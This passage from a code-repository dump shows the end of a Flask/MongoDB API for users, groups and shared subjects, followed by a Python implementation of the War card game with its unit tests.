cursor_g.close()\n\n return jsonify(owned=groups_owned, joined=groups_joined)\n\n\[email protected]('/<uid>/companions')\ndef get_user_companions(uid):\n \"\"\"get all companions of specified user\n\n @param uid: user id\n @return:\n \"\"\"\n companions = []\n\n cursor_group = db.groups.find({\"members\": uid})\n for g in cursor_group:\n members = g.get(\"members\", [])\n for m in members:\n if m == uid:\n continue\n\n existed = False\n for c in companions:\n if c.get(\"_id\", None) == m:\n c[\"from\"].append({\"owner_id\": g[\"uid\"], \"title\": g[\"title\"]})\n existed = True\n break\n\n if not existed:\n u = db.users.find_one({\"_id\": m})\n if u is None:\n continue\n else:\n companions.append({\"_id\": u[\"_id\"], \"email\": u[\"email\"], \"nick\": u[\"nick\"],\n \"from\": [{\"owner_id\": g[\"uid\"], \"title\": g[\"title\"]}]})\n\n return jsonify(result_set=companions)\n\n\[email protected]('/subjects/add/<uid>,<title>,<brief>,<objective>')\ndef new_subject(uid, title, brief, objective):\n \"\"\"add a new subject\n\n @param uid: user id\n @param title: title of subject\n @param brief: brief of subject\n @param objective: objective of subject\n @return:\n \"\"\"\n subject = 
{\"_id\": get_serial_id(\"serial_subject\"), \"title\": title, \"brief\": brief, \"objective\": objective,\n \"is_active\": True, \"uid\": uid}\n db.subjects.insert(subject)\n\n return jsonify(subject)\n\n\[email protected]('/subjects/upd/<int:sid>,<title>,<brief>,<objective>')\ndef update_subject(sid, title, brief, objective):\n \"\"\"update subject specified\n\n @param sid: subject id\n @param title:\n @param brief:\n @param objective:\n @return:\n \"\"\"\n db.subjects.update({\"_id\": sid}, {\"$set\": {\"title\": title, \"brief\": brief, \"objective\": objective}})\n\n return jsonify()\n\n\[email protected]('/subjects/del/<int:sid>')\ndef delete_subject(sid):\n \"\"\"delete subject specified\n\n @param sid: subject id to be delete\n @return:\n \"\"\"\n db.subjects.remove({\"_id\": sid})\n return jsonify()\n\n\[email protected]('/subjects/on/<int:sid>')\ndef on_subject(sid):\n \"\"\"active subject specified\n\n @param sid: subject id to be active\n @return:\n \"\"\"\n db.subjects.update({\"_id\": sid}, {\"$set\": {\"is_active\": True}})\n return jsonify()\n\n\[email protected]('/subjects/off/<int:sid>')\ndef off_subject(sid):\n \"\"\"de active subject\n\n @param sid: subject id to be de active\n @return:\n \"\"\"\n db.subjects.update({\"_id\": sid}, {\"$set\": {\"is_active\": False}})\n db.subjects.update({\"_id\": sid}, {\"$unset\": {\"groups\": 1}})\n return jsonify()\n\n\[email protected]('/subjects/share/<int:sid>,<gid>')\ndef share_subject(sid, gid):\n \"\"\"share subject specified to groups specified\n\n @param sid: subject id to be share\n @param gid: group id list split by \",\"\n @return:\n \"\"\"\n db.subjects.update({\"_id\": sid}, {\"$addToSet\": {\"groups\": {\"$each\": [int(e) for e in gid.split(',')]}}})\n\n return jsonify()\n\n\[email protected]('/subjects/grade/<serial_points>')\ndef grade_subject(serial_points):\n \"\"\"today grade, grade the current subject\n\n @param serial_points: grade points serial string,like:<sid:points>[,<sid:points>]\n @return:\n \"\"\"\n today = date.today().strftime(\"%F %T\")\n\n for pair in [e.split(':') for e in serial_points.split(',')]:\n sid = int(pair[0])\n points = int(pair[1])\n\n if db.subjects.find_one({\"_id\": sid, \"records.dt\": today}):\n db.subjects.update({\"_id\": sid, \"records.dt\": today}, {\"$set\": {\"records.$.points\": points}})\n else:\n db.subjects.update({\"_id\": sid}, {\"$push\": {\"records\": {\"dt\": today, \"points\": points}}})\n\n return jsonify()\n\n\[email protected]('/subjects/<uid>')\ndef get_subjects(uid):\n \"\"\"get all subjects of user specified\n\n @param uid: user id\n @return:\n \"\"\"\n subjects = []\n cursor_s = db.subjects.find({\"uid\": uid}, {\"records\": 0})\n for s in cursor_s:\n shared_to = s.get(\"groups\", [])\n s[\"groups\"] = []\n for gid in shared_to:\n group = db.groups.find_one({\"_id\": gid}, {\"uid\": 1, \"title\": 1})\n s[\"groups\"].append({\"_id\": group[\"_id\"], \"uid\": group[\"uid\"], \"title\": group[\"title\"]})\n\n if not s[\"groups\"]:\n del s[\"groups\"]\n\n subjects.append(s)\n cursor_s.close()\n\n return jsonify(result_set=subjects)\n\n\[email protected]('/subjects/<uid>/current')\ndef get_current_subjects(uid):\n \"\"\"get the active subjects of user specified\n\n @param uid: user id\n @return:\n \"\"\"\n subjects = []\n cursor_s = db.subjects.find({\"uid\": uid, \"is_active\": True})\n for s in cursor_s:\n shared_to = s.get(\"groups\", [])\n s[\"groups\"] = []\n for gid in shared_to:\n group = db.groups.find_one({\"_id\": gid}, {\"uid\": 1, \"title\": 1})\n 
s[\"groups\"].append({\"_id\": group[\"_id\"], \"uid\": group[\"uid\"], \"title\": group[\"title\"]})\n\n if not s[\"groups\"]:\n del s[\"groups\"]\n\n subjects.append(s)\n cursor_s.close()\n\n return jsonify(result_set=subjects)\n\n\[email protected]('/subjects/<uid>/history')\ndef get_history_subjects(uid):\n \"\"\"get the de active subjects of user specified\n\n @param uid: user id\n @return:\n \"\"\"\n subjects = []\n cursor_s = db.subjects.find({\"uid\": uid, \"is_active\": False})\n for s in cursor_s:\n subjects.append(s)\n cursor_s.close()\n\n return jsonify(result_set=subjects)\n\n\[email protected]('/subjects/<uid>/<cid>')\ndef get_companion_subjects(uid, cid):\n \"\"\"get subjects that companion specified shared to the user.\n\n @param uid: user id\n @param cid: companion's user id\n @return:\n \"\"\"\n\n cursor_group = db.groups.find({\"members\": uid})\n my_group = [g[\"_id\"] for g in cursor_group]\n cursor_group.close()\n\n subjects = []\n cursor_s = db.subjects.find({\"uid\": cid, \"is_active\": True})\n for s in cursor_s:\n shared_to = s.get(\"groups\", [])\n intersection = [g for g in shared_to if g in my_group]\n\n s[\"groups\"] = []\n for gid in intersection:\n group = db.groups.find_one({\"_id\": gid}, {\"uid\": 1, \"title\": 1})\n s[\"groups\"].append({\"_id\": group[\"_id\"], \"uid\": group[\"uid\"], \"title\": group[\"title\"]})\n\n if not s[\"groups\"]:\n del s[\"groups\"]\n\n subjects.append(s)\n\n return jsonify(result_set=subjects)\n\n\[email protected]('/memberships/add/<int:gid>,<direction>,<uid>,<notes>')\ndef new_membership(gid, direction, uid, notes):\n \"\"\"the specified user ask a membership for specified group\n\n @param gid: group id\n @param direction: A(ask) or I(invite)\n @param uid: user id\n @return:\n \"\"\"\n\n g = db.groups.find_one({\"_id\": gid}, {\"members\": 0})\n u = db.users.find_one({\"_id\": uid})\n\n m = {\"_id\": get_serial_id(\"serial_membership\"), \"group\": g, \"direction\": direction, \"user\": u, \"notes\": notes,\n \"dt\": str(datetime.now())}\n\n db.memberships.insert(m)\n\n return jsonify()\n\n\[email protected]('/memberships/acc/<int:mid>')\ndef accept_membership(mid):\n \"\"\"accept & delete the specified membership\n\n @param mid: membership id\n @return:\n \"\"\"\n m = db.memberships.find_one({\"_id\": mid})\n\n db.groups.update({\"_id\": m[\"group\"][\"_id\"]}, {\"$addToSet\": {\"members\": m[\"user\"][\"_id\"]}})\n db.memberships.remove({\"_id\": mid})\n\n return jsonify()\n\n\[email protected]('/memberships/del/<int:mid>')\ndef delete_membership(mid):\n \"\"\"delete the specified membership\n\n @param mid: membership id\n @return:\n \"\"\"\n db.memberships.remove({\"_id\": mid})\n\n return jsonify()\n\n\[email protected]('/memberships/<uid>')\ndef get_memberships(uid):\n \"\"\"get user's received membership message\n\n @param uid: user id\n @return:\n \"\"\"\n cursor_group = db.groups.find({\"uid\": uid})\n my_group = [g[\"_id\"] for g in cursor_group]\n cursor_group.close()\n\n cursor_ask = db.memberships.find({\"group._id\": {\"$in\": my_group}, \"direction\": \"A\"})\n ask = [m for m in cursor_ask]\n cursor_ask.close()\n\n cursor_invite = db.memberships.find({\"user\": uid, \"direction\": \"I\"})\n invite = [m for m in cursor_invite]\n cursor_invite.close()\n\n return jsonify(ask=ask, invite=invite)\n\n\ndef get_serial_id(serial_name):\n serial_id = db.serials.find_and_modify(query={\"_id\": serial_name}, update={\"$inc\": {\"current_id\": 1}}, new=True)\n\n if serial_id is None:\n db.serials.insert({\"_id\": 
serial_name, \"current_id\": 1})\n serial_id = db.serials.find_and_modify(\n query={\"_id\": serial_name},\n update={\"$inc\": {\"current_id\": 1}},\n new=True)\n\n return serial_id[\"current_id\"]\n\n\nif __name__ == '__main__':\n app.debug = False\n app.run()\n" } ]
1
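The gt.py service above wraps every protected route in the requires_auth decorator, which validates HTTP Basic credentials against the users collection. Below is a minimal client sketch; the base URL assumes Flask's default bind address, the alice/secret credentials are placeholders, and requests is an assumed third-party dependency:

import requests  # third-party HTTP client (assumed installed)

BASE = "http://localhost:5000"  # Flask's default host/port (assumption)

# index() is wrapped by @requires_auth, so a bad pair yields the custom 401 body.
resp = requests.get(BASE + "/", auth=("alice", "secret"))
print(resp.status_code)  # 200 if check_auth() accepts the pair, 401 otherwise
print(resp.json())       # the index route returns {"ok": true}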
iluisdaniel/war_card_game_python
https://github.com/iluisdaniel/war_card_game_python
db1548229646689acda625724eb4bbf9c92826da
c428e51e1c2ab8de3214d123e470b443701f938b
8e98db19702970b46748a7a78b092d9a8f428ddb
refs/heads/master
2022-06-18T10:32:42.670351
2020-05-01T20:16:49
2020-05-01T20:16:49
260,390,852
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6223625540733337, "alphanum_fraction": 0.6576312780380249, "avg_line_length": 36.10285568237305, "blob_id": "266b1620b5fe106bb618c2de7f7e28a22973cf7c", "content_id": "c6b195ddafef1c4432b96c0be80de3bcdc6c3835", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6493, "license_type": "no_license", "max_line_length": 277, "num_lines": 175, "path": "/tests/test_game.py", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "import sys\nsys.path.insert(0,'..')\n\nfrom war_game import Game\n\n\ndef test_game_set_up():\n\tprint(\"########## Testing the game is setup correctly\")\n\tg = Game([\"Luis\", \"Computer\"])\n\tassert len(g.player1.hand.cards) == 26 and len(g.player2.hand.cards) == 26, \"players cards should be 26\"\n\n\ndef test_player1_higher_Card():\n\tprint(\"########## Testing Player 1 with higher card\")\n\tg = Game([\"Luis\", \"Computer\"])\n\tg.player1.hand.empty_the_hand()\n\tg.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['spades', '6'], ['diamonds', '7'], ['spades', '3'], ['hearts', '10']]\n\tplayer2_cards= [['clubs', 'K'], ['clubs', '5'], ['diamonds', '8'], ['hearts', '5']]\n\n\tg.player1.hand.add_cards(player1_cards)\n\tg.player2.hand.add_cards(player2_cards)\n\n\tplayer1_deck_size_before = len(g.player1.hand.cards)\n\tplayer2_deck_size_before = len(g.player2.hand.cards)\n\n\tplayer1_card = g.player1.hand.play_card()\n\tplayer2_card = g.player2.hand.play_card()\n\n\tg.check_cards(player1_card, player2_card)\n\n\tg.table_cards.clear()\n\n\tassert (len(g.player1.hand.cards) == player1_deck_size_before + 1) and (len(g.player2.hand.cards) == player2_deck_size_before - 1), \"Player 1 should have one more card, and player two should have one less\"\n\ndef test_player2_higher_Card():\n\tprint(\"########## Testing Player 2 with higher card\")\n\tg = Game([\"Luis\", \"Computer\"])\n\tg.player1.hand.empty_the_hand()\n\tg.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['diamonds', '6'], ['clubs', '7'], ['spades', '3'], ['spades', '2']]\n\tplayer2_cards= [['hearts', 'K'], ['spades', '5'], ['diamonds', '8'], ['diamonds', 'A']]\n\n\tg.player1.hand.add_cards(player1_cards)\n\tg.player2.hand.add_cards(player2_cards)\n\n\tplayer1_deck_size_before = len(g.player1.hand.cards)\n\tplayer2_deck_size_before = len(g.player2.hand.cards)\n\n\tplayer1_card = g.player1.hand.play_card()\n\tplayer2_card = g.player2.hand.play_card()\n\n\tg.check_cards(player1_card, player2_card)\n\n\tg.table_cards.clear()\n\n\tassert (len(g.player2.hand.cards) == player2_deck_size_before + 1) and (len(g.player1.hand.cards) == player1_deck_size_before - 1), \"Player 2 should have one more card, and player 1 should have one less\"\n\ndef test_cards_on_table():\n\tprint(\"########## Testing Cards On Table\")\n\tg = Game([\"Luis\", \"Computer\"])\n\tg.player1.hand.empty_the_hand()\n\tg.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['spades', '6'], ['diamonds', '7'], ['spades', '3'], ['hearts', '10']]\n\tplayer2_cards= [['clubs', 'K'], ['clubs', '5'], ['diamonds', '8'], ['hearts', '5']]\n\n\tg.player1.hand.add_cards(player1_cards)\n\tg.player2.hand.add_cards(player2_cards)\n\n\tplayer1_card = g.player1.hand.play_card()\n\tplayer2_card = g.player2.hand.play_card()\n\n\tg.check_cards(player1_card, player2_card)\n\n\tcards_on_table = g.table_cards.copy()\n\n\tg.table_cards.clear()\n\n\tassert (player1_card in cards_on_table) and (player2_card in cards_on_table), \"cards should be on table\"\n\ndef 
test_war():\n\tprint(\"########## Testing War\")\n\tg = Game([\"Luis\", \"Computer\"])\n\tg.player1.hand.empty_the_hand()\n\tg.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['diamonds', '6'], ['clubs', '7'], ['spades', '3'], ['spades', '2'], ['clubs', '10']]\n\tplayer2_cards= [['hearts', 'K'], ['spades', '5'], ['diamonds', '8'], ['diamonds', 'A'], ['hearts', '10']]\n\n\tg.player1.hand.add_cards(player1_cards)\n\tg.player2.hand.add_cards(player2_cards)\n\n\tplayer1_deck_size_before = len(g.player1.hand.cards)\n\tplayer2_deck_size_before = len(g.player2.hand.cards)\n\n\tplayer1_card = g.player1.hand.play_card()\n\tplayer2_card = g.player2.hand.play_card()\n\n\tg.check_cards(player1_card, player2_card)\n\n\tassert (len(g.player2.hand.cards) == player2_deck_size_before + 5) and (len(g.player1.hand.cards) == player1_deck_size_before - 5), \"Player 2 should have 5 more cards, and player 1 should have 5 less\"\n\n\ndef test_war_with_no_enough_cards():\n\tprint(\"########## Testing War No Enough Cards\")\n\tgame = Game([\"Luis\", \"Computer\"])\n\tgame.player1.hand.empty_the_hand()\n\tgame.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['diamonds', '6'], ['clubs', '7'], ['clubs', '10']]\n\tplayer2_cards= [['hearts', 'K'], ['spades', '5'], ['diamonds', '8'], ['diamonds', 'A'], ['hearts', '10']]\n\n\tgame.player1.hand.add_cards(player1_cards)\n\tgame.player2.hand.add_cards(player2_cards)\n\n\tplayer1_deck_size_before = len(game.player1.hand.cards)\n\tplayer2_deck_size_before = len(game.player2.hand.cards)\n\n\tplayer1_card = game.player1.hand.play_card()\n\tplayer2_card = game.player2.hand.play_card()\n\n\tprint(game.player1.hand.cards)\n\tprint(game.player2.hand.cards)\n\n\tgame.check_cards(player1_card, player2_card)\n\n\tassert (len(game.player2.hand.cards) == player2_deck_size_before + player1_deck_size_before) and (len(game.player1.hand.cards) == 0), \"Player 2 should have all the cards, and player 1 should have zero cards\"\n\ndef test_multiple_wars():\n\tprint(\"########## Testing Multiple Wars\")\n\tgame = Game([\"Luis\", \"Computer\"])\n\tgame.player1.hand.empty_the_hand()\n\tgame.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['clubs', '4'],['diamonds', '4'], ['diamonds', '5'], ['diamonds', '2'], ['diamonds', 'K'], ['clubs', '7'], ['clubs', '3'], ['clubs', '2'], ['clubs', '10']]\n\tplayer2_cards= [['hearts', 'Q'], ['spades', '5'], ['spades', '8'], ['spades', 'A'],['spades', 'K'], ['hearts', '5'], ['hearts', '8'], ['hearts', 'A'], ['hearts', '10']]\n\n\tgame.player1.hand.add_cards(player1_cards)\n\tgame.player2.hand.add_cards(player2_cards)\n\n\tplayer1_deck_size_before = len(game.player1.hand.cards)\n\tplayer2_deck_size_before = len(game.player2.hand.cards)\n\n\tplayer1_card = game.player1.hand.play_card()\n\tplayer2_card = game.player2.hand.play_card()\n\n\tgame.check_cards(player1_card, player2_card)\n\n\tcards_on_table = game.table_cards.copy()\n\n\tassert (len(cards_on_table) == len(player1_cards) + len(player2_cards)) and (len(game.player2.hand.cards) == player2_deck_size_before + player1_deck_size_before) and (len(game.player1.hand.cards) == 0), \"Player 2 should have all the cards, and player 1 should have zero cards\"\n\ndef test_game():\n\tprint(\"########## Testing Game\")\n\tgame = Game([\"Luis\", \"Computer\"])\n\tgame.start()\n\n\tassert (len(game.player1.hand.cards) == 52 and len(game.player2.hand.cards) == 0) or (len(game.player2.hand.cards) == 52 and len(game.player1.hand.cards) == 0), \"One player should have all of the cards\"\n\n\n\nif __name__ == 
\"__main__\":\n\ttest_game()\n\ttest_game_set_up()\n\ttest_player1_higher_Card()\n\ttest_player2_higher_Card()\n\ttest_cards_on_table()\n\ttest_war()\n\ttest_war_with_no_enough_cards()\n\ttest_multiple_wars()\n\tprint(\"##########################\")\n\tprint(\"Everything passed\")\n" }, { "alpha_fraction": 0.6677316427230835, "alphanum_fraction": 0.6789137125015259, "avg_line_length": 26.2608699798584, "blob_id": "1929386e851c6e677af27a1e1995d2f36ef037b9", "content_id": "88744f0709bc7bd7c9cbc90c7279ab5c8a3637d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 626, "license_type": "no_license", "max_line_length": 58, "num_lines": 23, "path": "/tests/test_player.py", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "import sys\nsys.path.insert(0,'..')\n\nfrom war_game import Hand\nfrom war_game import Deck\nfrom war_game import Player\n\ndef test_cards_size_from_war_play():\n\td = Deck()\n\tplayer = Player(\"Luis\", Hand(d.cards))\n\tcards_facing_down = player.war_play()\n\tassert len(cards_facing_down) == 3, \"should be 3 cards\"\n\ndef test_players_hand_size_after_war():\n\td = Deck()\n\tplayer = Player(\"Luis\", Hand(d.cards))\n\tcards_facing_down = player.war_play()\n\tassert len(player.hand.cards) == 49, \"should be 49 cards\"\n\nif __name__ == \"__main__\":\n test_players_hand_size_after_war()\n test_cards_size_from_war_play()\n print(\"Everything passed\")" }, { "alpha_fraction": 0.6511968970298767, "alphanum_fraction": 0.6641426682472229, "avg_line_length": 26.296667098999023, "blob_id": "38333e4d2cfd3d031fcb383a19bafeefca7d870e", "content_id": "5598cf25f5609773f2c272d768d082e642c422ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8192, "license_type": "no_license", "max_line_length": 120, "num_lines": 300, "path": "/war_game.py", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "import random\n\nsuits = ['spades','hearts','diamonds', 'clubs']\nranks = ['2','3','4','5','6','7','8','9','10','J','Q','K','A']\n\n\nclass Deck:\n\t\"\"\"\n\t A Deck of cards.\n\n\t It will create a deck of 52 cards. \n\n\t A card is represented like this [suites, ranks].\n\n\t To shuffle the deck use shuffle()\n\n\t Attributes:\n\t cards: A list of lists representing cards.\n\t\"\"\"\n\t\n\tdef __init__(self):\n\t\tself.cards = []\n\t\tself.build_deck()\n\n\tdef build_deck(self):\n\t\t\"\"\" \n\t\t Itereates through the lists of suits and ranks to create a list of cards. \n\t\t\"\"\"\n\t\tfor suit in suits:\n\t\t\tfor rank in ranks:\n\t\t\t\tself.cards.append([suit, rank])\n\n\tdef shuffle(self):\n\t\t\"\"\" Shuffes the deck of cards \"\"\"\n\t\trandom.shuffle(self.cards)\n\n\nclass Hand:\n\t\"\"\"\n\t A hand of cards. \n\n\t Players will use this class to manage their cards and perform \n\t actions during a game. \n\n\t Attributes:\n\t cards: A list of lists representing cards.\n\t\"\"\"\n\tdef __init__(self, cards):\n\t\tself.cards = cards\n\n\tdef play_card(self):\n\t\t\"\"\" \n\t\t Play a card from the hand. \n\n\t\t It will remove and return the card from the top of the \n\t\t players' deck.\n\n\t\t Returns:\n\t\t A list representing a card. [suites, ranks]\n\n\t\t Raises:\n\t\t Index Error if the list is empty.\n\t\t\"\"\"\n\t\treturn self.cards.pop()\n\n\tdef add_cards(self, cards):\n\t\t\"\"\"\n\t\t Add cards to Players Hand. \n\n\t\t Add cards to the beginning of the list. Or bottom of the deck. 
\n\n\t\t Args:\n\t\t cards: A list of cards. \n\t\t\"\"\"\n\t\tself.cards = cards + self.cards\n\n\tdef show_cards(self):\n\t\t\"\"\" Print the player's cards \"\"\"\n\t\tprint(self.cards)\n\n\tdef is_empty(self):\n\t\t\"\"\" \n\t\t Check if the hand is empty.\n\n\t\t Return true if there are no cards in the player's hand. \n\n\t\t Returns:\n\t\t True or false depending if the hand is empty or not. \n\t\t\"\"\"\n\t\treturn len(self.cards) == 0\n\n\tdef empty_the_hand(self):\n\t\t\"\"\"\n\t\t Remove all of the cards from the hand. \n\n\t\t Remove cards and return cards removed. \n\n\t\t Returns:\n\t\t List of cards that were removed from hand. \n\t\t\"\"\"\n\t\ttemp = self.cards.copy()\n\t\tself.cards.clear()\n\t\treturn temp\n\n\nclass Player:\n\t\"\"\"\n\t A player for the game. \n\n\t Attributes:\n\t name: The name of the player\n\t hand: A hand object. The hand the player will use to play the game. \n\t\"\"\"\n\n\tdef __init__(self, name, hand):\n\t\tself.name = name\n\t\tself.hand = hand\n\n\tdef war_play(self):\n\t\t\"\"\"\n\t\t A war play\n\n\t\t Gives the 3 cards from the top of the deck. \n\n\t\t It gets the 3 cards. Then, it removes them from the player's hand. \n\t\t\t\n\t\t Returns:\n\t\t List of cards\n\t\t\"\"\"\n\t\tcards_facing_down = self.hand.cards[len(self.hand.cards)-3:]\n\t\tdel self.hand.cards[len(self.hand.cards)-3:]\n\t\treturn cards_facing_down\n\n\nclass Game:\n\t\"\"\"\n\t The War Game.\n\n\t Creates a game with all the functionality to set it up and to play it.\n\n\t To initialize it, it needs the names of the two players. Then it will create two Players\n\t with half of a shuffled deck of cards. \n\n\t Attributes:\n \t table_cards: A list of cards that are currently being played, or are on the table.\n\t player1: A player that will play the game.\n\t player2: Second player for the game. \n\t\"\"\"\n\n\tdef __init__(self, players):\n\t\tdeck = Deck()\n\t\tdeck.shuffle()\n\t\tself.table_cards = []\n\t\tself.player1 = Player(players[0], Hand(deck.cards[26:]))\n\t\tself.player2 = Player(players[1], Hand(deck.cards[:26]))\n\n\tdef start(self):\n\t\t\"\"\"\n\t\t Starts a game.\n\n\t\t It will play a card every time until a player ends up with an empty hand.\n\n\t\t After the players play their cards, it will compare them to see who wins. \n\n\t\t After a player with an empty hand is found, it will check the results. \n\t\t\"\"\"\n\t\tprint(\"Starting game\")\n\t\tcount = 0\n\t\twhile not self.player1.hand.is_empty() and not self.player2.hand.is_empty():\n\t\t\tprint(\"Turn \" + str(count))\n\n\n\t\t\tprint(\"Player1 number of cards \" + str(len(self.player1.hand.cards)))\n\t\t\tprint(\"Player2 number of cards \" + str(len(self.player2.hand.cards)))\n\t\t\tcount = count + 1\n\n\t\t\tplayer1_card = self.player1.hand.play_card()\n\t\t\tplayer2_card = self.player2.hand.play_card()\n\n\t\t\tprint(\"Player1 playing \" + str(player1_card))\n\t\t\tprint(\"Player2 playing \" + str(player2_card))\n\n\t\t\tself.check_cards(player1_card, player2_card)\n\n\t\t\tself.empty_table()\n\t\t\tprint(\"Cards in table \" + str(self.table_cards))\n\t\t\tprint(\"#########################################\")\n\n\n\t\tself.check_results()\n\t\t\t\n\n\tdef check_cards(self, player1_card, player2_card):\n\t\t\"\"\"\n\t\t Check the cards players played \n\n\t\t It compares two cards and it will add the cards on the table to \n\t\t whichever player's card is higher. \n\n\t\t In case the cards are the same it will do WAR!! 
It will take 3 cards from\n\t\t each player, add them to the table, and then the process will repeat again \n\t\t with new cards. \n\n\t\t If a player doesn't have enough cards to play WAR, it will empty their hand,\n\t\t put those cards on the table, and the other player will gain all the cards from the table.\n\n\t\t Args:\n\t\t player1_card: A card played from Player1\n\t\t player2_card: A card played from Player2\n\t\t Raises:\n\t\t IndexError: If the cards provided are not in the right format [suit, rank]\n\t\t\"\"\"\n\t\tself.table_cards.append(player1_card)\n\t\tself.table_cards.append(player2_card)\n\n\t\tprint(\"Cards in table \" + str(self.table_cards))\n\n\t\tif ranks.index(player1_card[1]) > ranks.index(player2_card[1]):\n\t\t\tprint(\"Player 1 WON!\")\n\t\t\tself.player1.hand.add_cards(self.table_cards)\n\t\telif ranks.index(player1_card[1]) < ranks.index(player2_card[1]):\n\t\t\tprint(\"Player 2 WON!\")\n\t\t\tself.player2.hand.add_cards(self.table_cards)\n\t\telse:\n\t\t\tprint(\"WAR!!!\")\n\t\t\tif self.player1.hand.is_empty() or self.player2.hand.is_empty():\n\t\t\t\treturn\n\n\t\t\tif len(self.player1.hand.cards) < 4:\n\t\t\t\tprint(\"Player 1 doesn't have enough cards!\")\n\t\t\t\tplayer1_last_cards = self.player1.hand.empty_the_hand()\n\t\t\t\tself.table_cards = self.table_cards + player1_last_cards\n\t\t\t\tself.player2.hand.add_cards(self.table_cards)\n\t\t\t\treturn\n\t\t\telif len(self.player2.hand.cards) < 4:\n\t\t\t\tprint(\"Player 2 doesn't have enough cards!\")\n\t\t\t\tplayer2_last_cards = self.player2.hand.empty_the_hand()\n\t\t\t\tself.table_cards = self.table_cards + player2_last_cards\n\t\t\t\tself.player1.hand.add_cards(self.table_cards)\n\t\t\t\treturn\n\n\t\t\tplayer1_facing_down_cards = self.player1.war_play()\n\t\t\tplayer2_facing_down_cards = self.player2.war_play()\n\n\t\t\tself.table_cards = self.table_cards + player1_facing_down_cards + player2_facing_down_cards\n\n\t\t\tplayer1_second_card = self.player1.hand.play_card()\n\t\t\tplayer2_second_card = self.player2.hand.play_card()\n\n\t\t\tprint(\"Player1 playing \" + str(player1_second_card))\n\t\t\tprint(\"Player2 playing \" + str(player2_second_card))\n\n\t\t\tself.check_cards(player1_second_card, player2_second_card)\n\n\tdef check_results(self):\n\t\t\"\"\" \n\t\t Display which player is the winner by checking their hands. \n\t\t\"\"\"\n\t\tif self.player1.hand.is_empty():\n\t\t\tprint(\"Congrats! Player 2 WON!!!\")\n\t\telif self.player2.hand.is_empty():\n\t\t\tprint(\"Congrats! Player 1 WON!!!\")\n\t\telse:\n\t\t\tprint(\"Error!!!!\")\n\n\tdef empty_table(self):\n\t\t\"\"\"\n\t\t Empty the cards on the table. \n\t\t\"\"\"\n\t\tself.table_cards = []\n\n\tdef display_game_info(self):\n\t\t\"\"\"\n\t\t Prints the information of the game into the console. \n\t\t\"\"\"\n\t\tprint(\"##### WELCOME TO WAR ##############\")\n\t\tprint(\"Player 1: %s\" % self.player1.name)\n\t\tprint(\"Player 2: %s\" % self.player2.name)\n\t\tprint(\"--------------------------------------\")\n\n\t\trules = \"\"\"\\nRules:\\n\nThe objective of the game is to win all of the cards.\n\nThe deck is divided evenly among the players, giving each a face-down stack. In unison, \neach player reveals the top card of their deck—this is a \"battle\"—and the player with \nthe higher card takes both of the cards played and moves them to their stack. Aces are high, and suits are ignored.\n\nIf the two cards played are of equal value, then there is a \"war\". 
Both players place the next three cards of their \npile face down and then another card face-up. The owner of the higher face-up card wins the war and adds all the cards \non the table to the bottom of their deck. If the face-up cards are again equal then the battle repeats with another set \nof face-down/up cards. This repeats until one player's face-up card is higher than their opponent's.\n\"\"\"\n\n\t\tprint(rules)\n\nif __name__ == \"__main__\":\n\tg = Game([\"Luis\", \"Computer\"])\n\tg.display_game_info()\n\tinput(\"Press Enter to continue...\")\n\tg.start()" }, { "alpha_fraction": 0.6387665271759033, "alphanum_fraction": 0.6530836820602417, "avg_line_length": 21.170732498168945, "blob_id": "d12747197b784f48d433978c8a1f992fa5487208", "content_id": "ebd4eaeb8bff6b36b964c141ba1b3368d009dfc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 908, "license_type": "no_license", "max_line_length": 88, "num_lines": 41, "path": "/tests/test_hand.py", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "import sys\nsys.path.insert(0,'..')\n\nfrom war_game import Hand\nfrom war_game import Deck\n\ndef test_card_play_size():\n\td = Deck()\n\th = Hand(d.cards)\n\tcard = h.play_card()\n\tassert len(h.cards) == 51, \"should be 51 cards\"\n\ndef test_card_play():\n\td = Deck()\n\th = Hand(d.cards)\n\tcard = h.play_card()\n\tassert not card in h.cards, \"should not be in hand\"\n\ndef test_empty_hands():\n\td = Deck()\n\th = Hand(d.cards)\n\tcards = h.empty_the_hand()\n\tassert h.is_empty() and len(cards) == 52, \"should be empty and temp cards should be 52\"\n\ndef test_adding_cards():\n\td = Deck()\n\th = Hand(d.cards)\n\ttemp_cards = []\n\ttemp_cards.append(h.play_card())\n\ttemp_cards.append(h.play_card())\n\ttemp_cards.append(h.play_card())\n\th.add_cards(temp_cards)\n\tassert len(h.cards) == 52, \"should be 52 cards\"\n\n\nif __name__ == \"__main__\":\n\ttest_card_play_size()\n\ttest_card_play()\n\ttest_empty_hands()\n\ttest_adding_cards()\n\tprint(\"Everything passed\")" }, { "alpha_fraction": 0.6391509175300598, "alphanum_fraction": 0.650943398475647, "avg_line_length": 19.238094329833984, "blob_id": "58cfb1eea5dcb1389a8212f38ad3772e3df7119b", "content_id": "f3a7ed150c9671eae468fd4067d8aca0e0479df0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 424, "license_type": "no_license", "max_line_length": 71, "num_lines": 21, "path": "/tests/test_deck.py", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "import sys\nsys.path.insert(0,'..')\n\nfrom war_game import Deck\n\ndef test_deck_size():\n\td = Deck()\n\tsize = len(d.cards)\n\tassert size == 52, \"should be 52 cards\"\n\ndef test_shuffle():\n\tdeck_shuffled = Deck()\n\tdeck_shuffled.shuffle()\n\t\n\tdeck_regular = Deck()\n\tassert deck_shuffled.cards != deck_regular.cards, \"Shouldn't be equal\"\n\nif __name__ == \"__main__\":\n test_deck_size()\n test_shuffle()\n print(\"Everything passed\")" }, { "alpha_fraction": 